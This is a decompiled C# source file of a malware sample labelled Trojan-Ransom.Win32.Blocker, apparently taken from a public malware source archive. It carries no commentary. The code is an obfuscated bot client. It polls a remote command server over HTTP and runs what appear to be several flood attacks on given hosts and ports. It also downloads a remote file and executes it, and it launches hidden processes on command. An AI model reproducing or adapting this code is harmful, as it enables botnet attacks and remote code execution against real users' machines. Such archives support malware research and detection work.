mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
283 lines
12 KiB
C#
283 lines
12 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: A.c9b81b1a3e4ee51d08f5de2448e459036
|
|||
|
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Collections.Generic;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
using System.Net;
|
|||
|
using System.Text;
|
|||
|
using System.Threading;
|
|||
|
|
|||
|
namespace A
|
|||
|
{
|
|||
|
internal class c9b81b1a3e4ee51d08f5de2448e459036
|
|||
|
{
|
|||
|
private string c749d615fce46a65e549ecd0269efb309 = string.Empty;
|
|||
|
|
|||
|
public void ccca4f7e07f327977d582f4cecb7af4cd()
|
|||
|
{
|
|||
|
this.c70c0917b5d671ac9ae9d4e7f861b66d0();
|
|||
|
new Thread(new ThreadStart(this.ca33aa6acdace65e5414a966dd1dc03ae)).Start();
|
|||
|
}
|
|||
|
|
|||
|
private void c70c0917b5d671ac9ae9d4e7f861b66d0()
|
|||
|
{
|
|||
|
string c2cbf7d2e1f35e8102d156c340d5f99cb = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1377) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c5c0d142f43b2ed4000991109cbc0575f + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1402) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cdd86f79582ee69b3331f0a01a8458c64 + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1419) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c08c5101a594b5e3a22d4e523b7baa2b1 + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1436) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c8d4d9680af49d6d5dcc86b05695287f2;
|
|||
|
while (true)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
string str = this.c372676659fe6f48f27b1ad11ccb40951(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ce6b1c08295456824d707adffcd771c22, c2cbf7d2e1f35e8102d156c340d5f99cb);
|
|||
|
if (str.Length > 0)
|
|||
|
{
|
|||
|
if (str == c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cf878f08181d5af12c924fb92b523534b)
|
|||
|
break;
|
|||
|
Environment.Exit(-1);
|
|||
|
}
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
Thread.Sleep(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cddb71d8bcf007ee24cca0a5fc8c9f9d1 * 60 * 1000);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private void ca33aa6acdace65e5414a966dd1dc03ae()
|
|||
|
{
|
|||
|
string c2cbf7d2e1f35e8102d156c340d5f99cb = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1453) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c5c0d142f43b2ed4000991109cbc0575f;
|
|||
|
while (true)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
string ce500fea65ca5a93a477a5ab3b4c7f34d = this.c372676659fe6f48f27b1ad11ccb40951(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ce6b1c08295456824d707adffcd771c22, c2cbf7d2e1f35e8102d156c340d5f99cb);
|
|||
|
if (ce500fea65ca5a93a477a5ab3b4c7f34d.Length > 0)
|
|||
|
{
|
|||
|
if (ce500fea65ca5a93a477a5ab3b4c7f34d != this.c749d615fce46a65e549ecd0269efb309)
|
|||
|
{
|
|||
|
this.c92d05caa41a6d8d9718da94fb32596c8(ce500fea65ca5a93a477a5ab3b4c7f34d);
|
|||
|
this.c749d615fce46a65e549ecd0269efb309 = ce500fea65ca5a93a477a5ab3b4c7f34d;
|
|||
|
}
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
c2b32128b27710d76674c1117f7f19ccf.c90f6d098ad5ce70814005fb0adf72870();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
c986963ced362383f6d7b6341e31dcfe7.c451004db98e7b627d5ee87fe743cb383();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
ca2a3d5a1b8d431c404c11a5f27d5064a.c4f970d2f71876e66d1daba6a51237e62();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
cb7379333abfa1ab1cb35304f3a8573ec.cc3c1bbd84093cbd7bdc83bcc5fb3ac15();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
this.c749d615fce46a65e549ecd0269efb309 = string.Empty;
|
|||
|
}
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
Thread.Sleep(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cddb71d8bcf007ee24cca0a5fc8c9f9d1 * 60 * 1000);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private string c372676659fe6f48f27b1ad11ccb40951(
|
|||
|
string cf7d7ab02f04f36e1e7781d49924e7769,
|
|||
|
string c2cbf7d2e1f35e8102d156c340d5f99cb)
|
|||
|
{
|
|||
|
ServicePointManager.Expect100Continue = false;
|
|||
|
HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(cf7d7ab02f04f36e1e7781d49924e7769);
|
|||
|
httpWebRequest.ContentType = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1478);
|
|||
|
httpWebRequest.Method = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1545);
|
|||
|
httpWebRequest.UserAgent = c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cf878f08181d5af12c924fb92b523534b;
|
|||
|
byte[] bytes = Encoding.ASCII.GetBytes(c2cbf7d2e1f35e8102d156c340d5f99cb);
|
|||
|
httpWebRequest.ContentLength = (long) bytes.Length;
|
|||
|
Stream requestStream = httpWebRequest.GetRequestStream();
|
|||
|
requestStream.Write(bytes, 0, bytes.Length);
|
|||
|
requestStream.Close();
|
|||
|
WebResponse response = httpWebRequest.GetResponse();
|
|||
|
return response == null ? string.Empty : new StreamReader(response.GetResponseStream()).ReadToEnd().Trim();
|
|||
|
}
|
|||
|
|
|||
|
private void c92d05caa41a6d8d9718da94fb32596c8(string ce500fea65ca5a93a477a5ab3b4c7f34d)
|
|||
|
{
|
|||
|
string[] strArray = new string[0];
|
|||
|
try
|
|||
|
{
|
|||
|
strArray = ce500fea65ca5a93a477a5ab3b4c7f34d.Split('*');
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
string key;
|
|||
|
if ((key = strArray[0]) == null)
|
|||
|
return;
|
|||
|
// ISSUE: reference to a compiler-generated field
|
|||
|
if (c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc == null)
|
|||
|
{
|
|||
|
// ISSUE: reference to a compiler-generated field
|
|||
|
c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc = new Dictionary<string, int>(8)
|
|||
|
{
|
|||
|
{
|
|||
|
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1554),
|
|||
|
0
|
|||
|
},
|
|||
|
{
|
|||
|
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1571),
|
|||
|
1
|
|||
|
},
|
|||
|
{
|
|||
|
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1590),
|
|||
|
2
|
|||
|
},
|
|||
|
{
|
|||
|
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1607),
|
|||
|
3
|
|||
|
},
|
|||
|
{
|
|||
|
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1626),
|
|||
|
4
|
|||
|
},
|
|||
|
{
|
|||
|
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1643),
|
|||
|
5
|
|||
|
},
|
|||
|
{
|
|||
|
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1654),
|
|||
|
6
|
|||
|
},
|
|||
|
{
|
|||
|
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1667),
|
|||
|
7
|
|||
|
}
|
|||
|
};
|
|||
|
}
|
|||
|
int num;
|
|||
|
// ISSUE: reference to a compiler-generated field
|
|||
|
// ISSUE: explicit non-virtual call
|
|||
|
if (!__nonvirtual (c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc.TryGetValue(key, out num)))
|
|||
|
return;
|
|||
|
switch (num)
|
|||
|
{
|
|||
|
case 0:
|
|||
|
try
|
|||
|
{
|
|||
|
c2b32128b27710d76674c1117f7f19ccf.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
|
|||
|
c2b32128b27710d76674c1117f7f19ccf.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]);
|
|||
|
c2b32128b27710d76674c1117f7f19ccf.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]);
|
|||
|
c2b32128b27710d76674c1117f7f19ccf.c52cb3c9fa9ea96db544af1bec7b932c8 = Convert.ToInt32(strArray[4]);
|
|||
|
c2b32128b27710d76674c1117f7f19ccf.c68372a86611194582de7bf4f45c72f47();
|
|||
|
break;
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
break;
|
|||
|
}
|
|||
|
case 1:
|
|||
|
try
|
|||
|
{
|
|||
|
c986963ced362383f6d7b6341e31dcfe7.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
|
|||
|
c986963ced362383f6d7b6341e31dcfe7.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[2]);
|
|||
|
c986963ced362383f6d7b6341e31dcfe7.cef8e53905308fbf449ffc06b3aecf429();
|
|||
|
break;
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
break;
|
|||
|
}
|
|||
|
case 2:
|
|||
|
try
|
|||
|
{
|
|||
|
ca2a3d5a1b8d431c404c11a5f27d5064a.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
|
|||
|
ca2a3d5a1b8d431c404c11a5f27d5064a.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]);
|
|||
|
ca2a3d5a1b8d431c404c11a5f27d5064a.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]);
|
|||
|
ca2a3d5a1b8d431c404c11a5f27d5064a.ce1f122b7ea8865781912d724c92b0e28 = Convert.ToInt32(strArray[4]);
|
|||
|
ca2a3d5a1b8d431c404c11a5f27d5064a.cced20ebbb17c5b4c22dbd925be9f7bd0 = Convert.ToInt32(strArray[5]);
|
|||
|
ca2a3d5a1b8d431c404c11a5f27d5064a.c1e47aee5510fe6af6ef6c306b4a8c34a();
|
|||
|
break;
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
break;
|
|||
|
}
|
|||
|
case 3:
|
|||
|
try
|
|||
|
{
|
|||
|
cb7379333abfa1ab1cb35304f3a8573ec.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
|
|||
|
cb7379333abfa1ab1cb35304f3a8573ec.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]);
|
|||
|
cb7379333abfa1ab1cb35304f3a8573ec.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]);
|
|||
|
cb7379333abfa1ab1cb35304f3a8573ec.cf0383b25e10d922cf775f947a9893ddb = Convert.ToInt32(strArray[4]);
|
|||
|
cb7379333abfa1ab1cb35304f3a8573ec.cced20ebbb17c5b4c22dbd925be9f7bd0 = Convert.ToInt32(strArray[5]);
|
|||
|
cb7379333abfa1ab1cb35304f3a8573ec.cd351d92ca1a938962136bd5808af7e90();
|
|||
|
break;
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
break;
|
|||
|
}
|
|||
|
case 4:
|
|||
|
try
|
|||
|
{
|
|||
|
string str = c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c4028bc68211f16a03921654b4b8b346f(new Random().Next(5, 12)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1680);
|
|||
|
new WebClient().DownloadFile(Convert.ToString(strArray[1]), Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str);
|
|||
|
new Process()
|
|||
|
{
|
|||
|
StartInfo = {
|
|||
|
FileName = (Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str)
|
|||
|
}
|
|||
|
}.Start();
|
|||
|
break;
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
break;
|
|||
|
}
|
|||
|
case 5:
|
|||
|
try
|
|||
|
{
|
|||
|
Process process = new Process()
|
|||
|
{
|
|||
|
StartInfo = new ProcessStartInfo(Convert.ToString(strArray[1]))
|
|||
|
};
|
|||
|
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
|
|||
|
process.Start();
|
|||
|
break;
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
break;
|
|||
|
}
|
|||
|
case 6:
|
|||
|
c57ac7140997a29abffbea04a04f33fc6.cb5ecebe7cbd234304d7228da096a3fa0.c32ad199a1a1b21b2f3794ba8b7927c6b(Convert.ToString(strArray[1]));
|
|||
|
break;
|
|||
|
case 7:
|
|||
|
if (!(strArray[1] == Environment.MachineName) && !(strArray[1].ToUpper() == c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1698)))
|
|||
|
break;
|
|||
|
c57ac7140997a29abffbea04a04f33fc6.cb5ecebe7cbd234304d7228da096a3fa0.ceaf8f38b42d6fe6312cc350ddb4ba0d6();
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|